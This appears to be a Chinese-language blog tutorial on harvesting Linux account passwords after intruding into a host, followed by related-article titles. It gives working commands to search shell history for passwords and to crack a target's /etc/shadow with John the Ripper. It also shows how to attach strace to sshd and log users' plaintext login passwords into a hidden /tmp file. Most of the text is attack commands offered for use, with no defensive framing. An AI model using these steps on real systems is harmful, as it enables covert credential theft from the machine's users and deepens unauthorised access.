Linux密码破解(非远程爆破)
前言:在通过各种手段(如反弹shell 提权)进入到Linux主机系统中,该如何拿到该系统的账号密码呢?
1.history
通过history的记录,看是否有明文输入的密码。
history|grep root #root可改为其他账号名
2.破解shadow文件(john工具)
利用john工具对shadow文件进行破解
将靶机的/etc/shadow文件转移到自己机器上,或者直接在靶机上破解(不推荐)
获取john源码并编译(本文用的john版本为1.9.0,请自行到官网上选择想用的版本)
https://download.openwall.net/pub/
wget https://www.openwall.com/john/k/john-1.9.0.tar.gz
tar -zxvf john-1.9.0.tar.gz
cd ./src
make clean linux-x86-64
cd ../run
1)简单密码文件破解
注:使用了john自带的一个密码文件:password.lst,可以在安装目录中找到
./john /etc/shadow
2)用户名变化密码破解
注:如一个用户名为test,破解诸如 test123 test1等密码。
./john -single /etc/shadow
3)指定密码文件破解
./john -w:/root/pass.txt /etc/shadow #自定义密码文件/root/pass.txt
john的其他操作
*破解后得到的密码都会存放在john.pot文件中
*异常中断破解后继续破解
./john -restore
*不使用密码字典,字母数字遍历组合
注:对于使用了特殊字符的密码可能无法破解成功,另外需要强悍的性能和大量的时间(所以不推荐在靶机上破解,哈哈)
./john -incremental /etc/shadow
3.strace收集明文密码
监控sshd程序
执行命令:监控300秒内,sshd进程的动作,如果在监控的时间段内有用户登录成功,则有记录。
timeout 300 strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &
查看结果
grep -E -A1 'read\(6, ".+f\\0\\0\\0\\f.+"' /tmp/.sshd.log
Linux密码破解(非远程爆破)相关推荐
- Linux密码破解(使用hydra工具和使用john暴力破解)
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 一.使用hydra离线破解linux密码 1.准备实验环境 2.创建用户名字典 3.hydra密码爆破 二.复制shadow ...
- 【CyberSecurityLearning 41】Linux密码破解以及菜单加密
目录 了解系统的启动流程(故障修复) 实验1.单用户破密码 拓展:kali破解系统密码 演示: 总结:单用户破密码过程 centos: kali系统破解root密码: GRUB引导菜单加密 总结系统的 ...
- Linux 密码破解之 John the Ripper
一.安装John the Ripper 下载:wget http://www.openwall.com/john/k/john-1.9.0.tar.gz 解压:tar -xvf john-1.8.0. ...
- Kali Linux渗透测试 106 离线密码破解
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的<Kali Linux 渗透测试>课程 Kali Linux渗透测试(苑房弘)博客记录 1. ...
- kali密码破解笔记
密码破解 思路 目标系统实施了强安全措施 ·安装了所有补丁 ·无任何已知漏洞 ·无应用层漏洞 ·攻击面最小化 社会工程学 获取目标系统用户身份 ·非授权用户不受信,认证用户可以访问守信资源 ·已有用户 ...
- kali上的一些密码破解工具
在线密码破解 字典 kali的一些字典: /usr/share/wordlist /usr/share/wfuzz/wordlist /usr/share/seclists 工具 crunch创建所需 ...
- 第十三章 密码破解
思路 目标系统实施了强安全措施 – 安装了所有补丁 – 无任何已知漏洞 – 无应用层漏洞 – 攻击面最小化 社会工程学 获取目标系统用户身份 – 非授权用户不受信,认证用户可以访问守信资源 – 已有用 ...
- 【安全牛学习笔记】字典、在线密码破解-hydra
字典 按个人信息生成其专属的密码字典 CUPP: Common User Password Profiler - git clone https://github.com/Mebus/cupp.git ...
- 第九天 03-破解linux密码
Linux密码破解 简介: Linux密码信息保存在两个文件中,分别为:/etc/passwd和/etc/shadow 1. /etc/passwd: 文件介绍: 普通用户权限能够查看 一般etc/p ...
最新文章
- android判断模拟器的三种方法
- just have a view of the open source project i contributed!!!
- 请求solr服务器未响应,solr与tomcat整合
- mysql获取时间戳_服了!阿里Mysql三位封神专家总结1200多页性能优化的千金良方...
- 《目标检测》R-CNN、SPP-NET、Fast R-CNN、Faster R-CNN
- shell如何检测linux发行版本,shell判断软件版本
- 用Supermemo背单词达到8000词条
- 前端字符串去空白字符,包括空格、制表符、换页符
- linux指定行添加内容,Linux sed命令在指定行前后添加内容
- echarts报表javascript插件简介
- JavaScript实时获取现货黄金,白银,美元指数价格代码
- Eclipse之cannot be resolved to a type
- Service Mesh Summit 服务网格峰会 2022 正在报名中
- Kubernetes--k8s--进阶--全面了解HPA--部署HPA实现高可用和成本控制
- Ubuntu16.04+CUDA8.0+cudnn5.1+TensorFlow-GPU详细安装步骤
- 3人3天喝3桶水,9人9天喝了多少桶水?
- JWT框架简单测评,哪款是你的菜
- 如何压缩照片到30kb以下?三个方法
- 2020西工大c语言程序设计在线作业答案,2020-C语言程序设计-网课答案-中国大学mooc...
- PostgreSQL 基础--常用命令
热门文章
- OpenHarmony驱动子系统开发
- python如何将两个list合并成字典_怎么把两个列表合并成字典 论Python怎样将两个list合并为一个字典...
- Erebus 0.5 发布,2D 实时角色扮演游戏
- 【效率神器】电脑上实现语音输入文字
- 智慧交通,迎来产业谍战丨产业特稿
- 基于TCP的网络对战象棋--python
- 解锁“不可能”:苏门答腊犀牛让我开始重新思考AI
- matlab中寻找矩阵元素并替换
- win10远程桌面连接凭据怎么设置_win10系统设置让远程桌面连接记住密码下次登录不需再输入的步骤...
- php获取某一年的工作日列表